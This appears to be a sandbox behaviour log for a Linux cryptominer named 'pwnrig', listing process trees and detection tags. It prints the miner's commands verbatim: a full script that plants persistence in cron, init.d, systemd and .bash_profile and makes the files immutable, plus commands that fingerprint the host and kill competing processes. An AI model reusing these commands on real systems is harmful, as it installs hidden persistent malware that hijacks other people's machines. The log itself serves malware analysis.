    /usr/bin/sed  sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig  PID:3484
      - Creates/modifies Cron job
    /usr/bin/chmod  chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr  PID:3485
      - File and Directory Permissions Modification
    /usr/bin/chattr  chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr  PID:3486
    /usr/bin/which  which chkconfig  PID:3487
    /usr/bin/which  which update-rc.d  PID:3488
    /usr/bin/chattr  chattr -i -a /etc/init.d/pwnrig /bin/initdr  PID:3489
    /usr/sbin/update-rc.d  update-rc.d -f pwnrig disable  PID:3490
      - Flushes firewall rules
      /usr/local/sbin/systemctl  systemctl --quiet disable pwnrig  PID:3491
      /usr/local/bin/systemctl  systemctl --quiet disable pwnrig  PID:3491
      /usr/sbin/systemctl  systemctl --quiet disable pwnrig  PID:3491
      /usr/bin/systemctl  systemctl --quiet disable pwnrig  PID:3491
        - Reads EFI boot settings
      /usr/local/sbin/systemctl  systemctl daemon-reload  PID:3517
      /usr/local/bin/systemctl  systemctl daemon-reload  PID:3517
      /usr/sbin/systemctl  systemctl daemon-reload  PID:3517
      /usr/bin/systemctl  systemctl daemon-reload  PID:3517
    /usr/sbin/update-rc.d  update-rc.d -f pwnrig remove  PID:3543
      /usr/local/sbin/systemctl  systemctl daemon-reload  PID:3544
      /usr/local/bin/systemctl  systemctl daemon-reload  PID:3544
      /usr/sbin/systemctl  systemctl daemon-reload  PID:3544
      /usr/bin/systemctl  systemctl daemon-reload  PID:3544
        - Reads EFI boot settings
    /usr/bin/rm  rm -rf /bin/initdr  PID:3570
    /usr/bin/cp  cp -f -r -- /tmp/service-agent /bin/initdr  PID:3571
      - Writes file to system bin folder
    /usr/bin/tee  tee /etc/init.d/pwnrig  PID:3573
      - Modifies init.d
    /usr/bin/sed  sed -i "1 s/-e //" /etc/init.d/pwnrig  PID:3574
      - Attempts to change immutable files
      - Modifies init.d
    /usr/bin/chmod  chmod +x /etc/init.d/pwnrig /bin/initdr  PID:3575
      - File and Directory Permissions Modification
    /usr/sbin/update-rc.d  update-rc.d pwnrig defaults  PID:3576
      /usr/local/sbin/systemctl  systemctl daemon-reload  PID:3577
      /usr/local/bin/systemctl  systemctl daemon-reload  PID:3577
      /usr/sbin/systemctl  systemctl daemon-reload  PID:3577
      /usr/bin/systemctl  systemctl daemon-reload  PID:3577
        - Reads EFI boot settings
    /usr/sbin/update-rc.d  update-rc.d pwnrig enable  PID:3603
      /usr/local/sbin/systemctl  systemctl --quiet enable pwnrig  PID:3604
      /usr/local/bin/systemctl  systemctl --quiet enable pwnrig  PID:3604
      /usr/sbin/systemctl  systemctl --quiet enable pwnrig  PID:3604
      /usr/bin/systemctl  systemctl --quiet enable pwnrig  PID:3604
      /usr/local/sbin/systemctl  systemctl daemon-reload  PID:3605
      /usr/local/bin/systemctl  systemctl daemon-reload  PID:3605
      /usr/sbin/systemctl  systemctl daemon-reload  PID:3605
      /usr/bin/systemctl  systemctl daemon-reload  PID:3605
        - Reads EFI boot settings
    /usr/bin/chattr  chattr +i +a /etc/init.d/pwnrig /bin/initdr  PID:3631
    /usr/bin/which  which systemctl  PID:3632
    /usr/bin/chattr  chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr  PID:3633
    /usr/bin/rm  rm -rf /bin/sysdr  PID:3634
    /usr/bin/cp  cp -f -r -- /tmp/service-agent /bin/sysdr  PID:3635
      - Writes file to system bin folder
    /usr/bin/tee  tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service  PID:3637
      - Modifies systemd
    /usr/bin/sed  sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service  PID:3638
    /usr/bin/chattr  chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr  PID:3639
    /usr/bin/systemctl  systemctl enable pwnrige.service  PID:3640
      - Reads EFI boot settings
    /usr/bin/systemctl  systemctl enable pwnrigl.service  PID:3666
      - Reads EFI boot settings
    /usr/bin/systemctl  systemctl daemon-reload  PID:3692
    /usr/bin/systemctl  systemctl reload-or-restart pwnrige.service
      - Reads EFI boot settings
PID:3718
-
-
-
-
  [PID 3775] /tmp/service-agent: /tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d
    - Executes dropped EXE
    - Checks hardware identifiers (DMI)
    - Reads hardware information
    - Checks CPU configuration
    - Enumerates kernel/hardware configuration
    - Writes file to tmp directory
    [PID 3799] /bin/sh: sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
      - Attempts to change immutable files
      [PID 3802] /usr/bin/hostname: hostname -I
      [PID 3804] /usr/bin/awk: awk "{print \$1}"
      [PID 3809] /usr/bin/awk: awk "{print \"-\"\$2}"
      [PID 3808] /usr/bin/head: head -n 1
      [PID 3807] /usr/bin/grep: grep "Port "
      [PID 3806] /usr/bin/cat: cat /etc/ssh/sshd_config
      [PID 3810] /usr/bin/whoami: whoami
      [PID 3811] /usr/bin/hostname: hostname
      [PID 3812] /usr/bin/grep: grep -c "^processor" /proc/cpuinfo
      [PID 3818] /usr/bin/sed: sed -e "s/\$//"
      [PID 3817] /usr/bin/sed: sed -e "s/^ *//"
      [PID 3816] /usr/bin/cut: cut -d: -f2
      [PID 3815] /usr/bin/grep: grep -m 1 "model name" /proc/cpuinfo
        - Checks CPU configuration
      [PID 3821] /usr/bin/awk: awk "{print \$1}"
      [PID 3824] /usr/bin/awk: awk "{print \$4}"
      [PID 3827] /usr/bin/awk: awk "{print \$4}"
    [PID 3828] /bin/sh: sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
      [PID 3830] /usr/bin/awk: awk "/[zZ]/ && !a[\$2]++ {print \$2}"
      [PID 3829] /usr/bin/ps: ps -A "-ostat,ppid"
      [PID 3832] /usr/bin/id: id -u
      [PID 3835] /usr/bin/grep: grep -v grep
      [PID 3834] /usr/bin/grep: grep /etc/cron
      [PID 3833] /usr/bin/ps: ps x
        - Reads runtime system information
    [PID 3837] /bin/sh: sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
      - Security Software Discovery
      [PID 3838] /usr/bin/id: id -u
      [PID 3843] /usr/bin/awk: awk "{if(\$3>30.0) print \$2}"
      [PID 3842] /usr/bin/grep: grep -v /usr/sbin/httpd
      [PID 3841] /usr/bin/grep: grep -v -- "-bash[[:space:]]*\$"
      [PID 3840] /usr/bin/grep: grep -v grep
      [PID 3839] /usr/bin/ps: ps aux
        - Process Discovery
        - Reads runtime system information
    [PID 3845] /bin/sh: sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
      - Security Software Discovery
      [PID 3846] /usr/bin/id: id -u
      [PID 3852] /usr/bin/wc: wc -l
      [PID 3851] /usr/bin/awk: awk "{if(\$3>30.0) print \$2}"
      [PID 3850] /usr/bin/grep: grep -- "-bash[[:space:]]*\$"
      [PID 3849] /usr/bin/grep: grep -v grep
      [PID 3848] /usr/bin/ps: ps aux
        - Reads CPU attributes
        - Process Discovery
        - Reads runtime system information
  [PID 3853] /usr/bin/crontab: crontab -r
  [PID 3854] /usr/bin/pkill: pkill -f .klibsystem5
    - Reads CPU attributes
  [PID 3855] /usr/bin/pkill: pkill -f .klibsystem4
    - Reads CPU attributes
    - Reads runtime system information
  [PID 3856] /usr/bin/bash: bash -c "echo \"* * * * * /usr/local/share/.klibsystem5 >/dev/null 2>&1\" | crontab -"
    [PID 3858] /usr/bin/crontab: crontab -
      - Creates/modifies Cron job
  [PID 3859] /usr/bin/chattr: chattr -ia /etc/cron.d/.lib-knlib4
    - Attempts to change immutable files
  [PID 3860] /usr/bin/chattr: chattr +ia /etc/cron.d/.lib-knlib4
    - Attempts to change immutable files
  [PID 3861] /usr/bin/chattr: chattr -ia /var/spool/cron/.lib-knlib4
  [PID 3862] /usr/bin/chattr: chattr +ia /var/spool/cron/.lib-knlib4
  [PID 3863] /usr/bin/chattr: chattr -ia /etc/cron.hourly/.lib-knlib4
  [PID 3864] /usr/bin/chattr: chattr +ia /etc/cron.hourly/.lib-knlib4
  [PID 3865] /usr/bin/chattr: chattr -ia /etc/cron.daily/.lib-knlib4
  [PID 3866] /usr/bin/chattr: chattr +ia /etc/cron.daily/.lib-knlib4
  [PID 3867] /usr/bin/chattr: chattr -ia /etc/cron.weekly/.lib-knlib4
  [PID 3868] /usr/bin/chattr: chattr +ia /etc/cron.weekly/.lib-knlib4
  [PID 3869] /usr/bin/chattr: chattr -ia /etc/cron.monthly/.lib-knlib4
  [PID 3870] /usr/bin/chattr: chattr +ia /etc/cron.monthly/.lib-knlib4
  [PID 3871] /usr/bin/chattr: chattr -ia /etc/anacrontab
  [PID 3872] /usr/bin/chattr: chattr +ia /etc/anacrontab
  [PID 3873] /tmp/sys-helper: /tmp/sys-helper
    - Executes dropped EXE
    - Writes file to tmp directory
  [PID 3874] /tmp/service-agent: /tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
    - Executes dropped EXE
    - Checks hardware identifiers (DMI)
    - Reads hardware information
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    [PID 3875] /bin/sh: sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
      [PID 3878] /usr/bin/hostname: hostname -I
      [PID 3880] /usr/bin/awk: awk "{print \$1}"
      [PID 3885] /usr/bin/awk: awk "{print \"-\"\$2}"
      [PID 3884] /usr/bin/head: head -n 1
      [PID 3883] /usr/bin/grep: grep "Port "
      [PID 3882] /usr/bin/cat: cat /etc/ssh/sshd_config
      [PID 3886] /usr/bin/whoami: whoami
      [PID 3887] /usr/bin/hostname: hostname
      [PID 3888] /usr/bin/grep: grep -c "^processor" /proc/cpuinfo
        - Checks CPU configuration
      [PID 3894] /usr/bin/sed: sed -e "s/\$//"
      [PID 3893] /usr/bin/sed: sed -e "s/^ *//"
      [PID 3892] /usr/bin/cut: cut -d: -f2
      [PID 3891] /usr/bin/grep: grep -m 1 "model name" /proc/cpuinfo
        - Checks CPU configuration
      [PID 3897] /usr/bin/awk: awk "{print \$1}"
      [PID 3900] /usr/bin/awk: awk "{print \$4}"
      [PID 3903] /usr/bin/awk: awk "{print \$4}"
    [PID 3904] /bin/sh: sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
      [PID 3906] /usr/bin/awk: awk "/[zZ]/ && !a[\$2]++ {print \$2}"
      [PID 3905] /usr/bin/ps: ps -A "-ostat,ppid"
        - Reads CPU attributes
      [PID 3908] /usr/bin/id: id -u
      [PID 3911] /usr/bin/grep: grep -v grep
      [PID 3910] /usr/bin/grep: grep /etc/cron
      [PID 3909] /usr/bin/ps: ps x
        - Reads CPU attributes
        - Reads runtime system information
    [PID 3913] /bin/sh: sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
      - File and Directory Permissions Modification
      - Writes file to tmp directory
      [PID 3914] /usr/bin/id: id -u
      [PID 3915] /usr/bin/id: id -u
      [PID 3916] /usr/bin/chattr: chattr -i -a /bin/bprofr "~/.bash_profile"
      [PID 3917] /usr/bin/rm: rm -rf /bin/bprofr
      [PID 3918] /usr/bin/sed: sed -i /bprofr/d "~/.bash_profile"
      [PID 3919] /usr/bin/cp: cp -f -r -- /tmp/service-agent /bin/bprofr
        - Writes file to system bin folder
      [PID 3920] /usr/bin/id: id -u
      [PID 3921] /usr/bin/chattr: chattr +i +a /bin/bprofr "~/.bash_profile"
      [PID 3922] /usr/bin/mkdir: mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
      [PID 3923] /usr/bin/chattr: chattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
      [PID 3924] /usr/bin/rm: rm -rf /bin/crondr
      [PID 3925] /usr/bin/cp: cp -f -r -- /tmp/service-agent /bin/crondr
        - Writes file to system bin folder
      [PID 3927] /usr/bin/tee: tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
        - Creates/modifies Cron job
      [PID 3928] /usr/bin/sed: sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
        - Attempts to change immutable files
        - Creates/modifies Cron job
      [PID 3929] /usr/bin/chmod: chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
        - File and Directory Permissions Modification
      [PID 3930] /usr/bin/chattr: chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
      [PID 3931] /usr/bin/which: which chkconfig
      [PID 3932] /usr/bin/which: which update-rc.d
      [PID 3933] /usr/bin/chattr: chattr -i -a /etc/init.d/pwnrig /bin/initdr
      [PID 3934] /usr/sbin/update-rc.d: update-rc.d -f pwnrig disable
        - Flushes firewall rules
        [PID 3935] /usr/local/sbin/systemctl: systemctl --quiet disable pwnrig
        [PID 3935] /usr/local/bin/systemctl: systemctl --quiet disable pwnrig
        [PID 3935] /usr/sbin/systemctl: systemctl --quiet disable pwnrig
        [PID 3935] /usr/bin/systemctl: systemctl --quiet disable pwnrig
        [PID 3961] /usr/local/sbin/systemctl: systemctl daemon-reload
        [PID 3961] /usr/local/bin/systemctl: systemctl daemon-reload
        [PID 3961] /usr/sbin/systemctl: systemctl daemon-reload
        [PID 3961] /usr/bin/systemctl: systemctl daemon-reload
          - Reads EFI boot settings
      [PID 3987] /usr/sbin/update-rc.d: update-rc.d -f pwnrig remove
        [PID 3988] /usr/local/sbin/systemctl: systemctl daemon-reload
        [PID 3988] /usr/local/bin/systemctl: systemctl daemon-reload
        [PID 3988] /usr/sbin/systemctl: systemctl daemon-reload
        [PID 3988] /usr/bin/systemctl: systemctl daemon-reload
          - Reads EFI boot settings
      [PID 4014] /usr/bin/rm: rm -rf /bin/initdr
      [PID 4015] /usr/bin/cp: cp -f -r -- /tmp/service-agent /bin/initdr
        - Writes file to system bin folder
      [PID 4017] /usr/bin/tee: tee /etc/init.d/pwnrig
        - Modifies init.d
      [PID 4018] /usr/bin/sed: sed -i "1 s/-e //" /etc/init.d/pwnrig
        - Attempts to change immutable files
        - Modifies init.d
      [PID 4019] /usr/bin/chmod: chmod +x /etc/init.d/pwnrig /bin/initdr
        - File and Directory Permissions Modification
      [PID 4020] /usr/sbin/update-rc.d: update-rc.d pwnrig defaults
        [PID 4021] /usr/local/sbin/systemctl: systemctl daemon-reload
        [PID 4021] /usr/local/bin/systemctl: systemctl daemon-reload
        [PID 4021] /usr/sbin/systemctl: systemctl daemon-reload
        [PID 4021] /usr/bin/systemctl: systemctl daemon-reload
      [PID 4047] /usr/sbin/update-rc.d: update-rc.d pwnrig enable
        [PID 4048] /usr/local/sbin/systemctl: systemctl --quiet enable pwnrig
        [PID 4048] /usr/local/bin/systemctl: systemctl --quiet enable pwnrig
        [PID 4048] /usr/sbin/systemctl: systemctl --quiet enable pwnrig
        [PID 4048] /usr/bin/systemctl: systemctl --quiet enable pwnrig
        [PID 4049] /usr/local/sbin/systemctl: systemctl daemon-reload
        [PID 4049] /usr/local/bin/systemctl: systemctl daemon-reload
        [PID 4049] /usr/sbin/systemctl: systemctl daemon-reload
        [PID 4049] /usr/bin/systemctl: systemctl daemon-reload
      [PID 4075] /usr/bin/chattr: chattr +i +a /etc/init.d/pwnrig /bin/initdr
      [PID 4076] /usr/bin/which: which systemctl
      [PID 4077] /usr/bin/chattr: chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
      [PID 4078] /usr/bin/rm: rm -rf /bin/sysdr
      [PID 4079] /usr/bin/cp: cp -f -r -- /tmp/service-agent /bin/sysdr
        - Writes file to system bin folder
      [PID 4081] /usr/bin/tee: tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
        - Modifies systemd
      [PID 4082] /usr/bin/sed: sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
      [PID 4083] /usr/bin/chattr: chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
        - Attempts to change immutable files
      [PID 4084] /usr/bin/systemctl: systemctl enable pwnrige.service
      [PID 4110] /usr/bin/systemctl: systemctl enable pwnrigl.service
        - Reads EFI boot settings
      [PID 4136] /usr/bin/systemctl: systemctl daemon-reload
        - Reads EFI boot settings
      [PID 4162] /usr/bin/systemctl: systemctl reload-or-restart pwnrige.service
  [PID 4219] /tmp/service-agent: /tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d
    - Executes dropped EXE
    - Checks hardware identifiers (DMI)
    - Reads hardware information
    - Checks CPU configuration
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Writes file to tmp directory
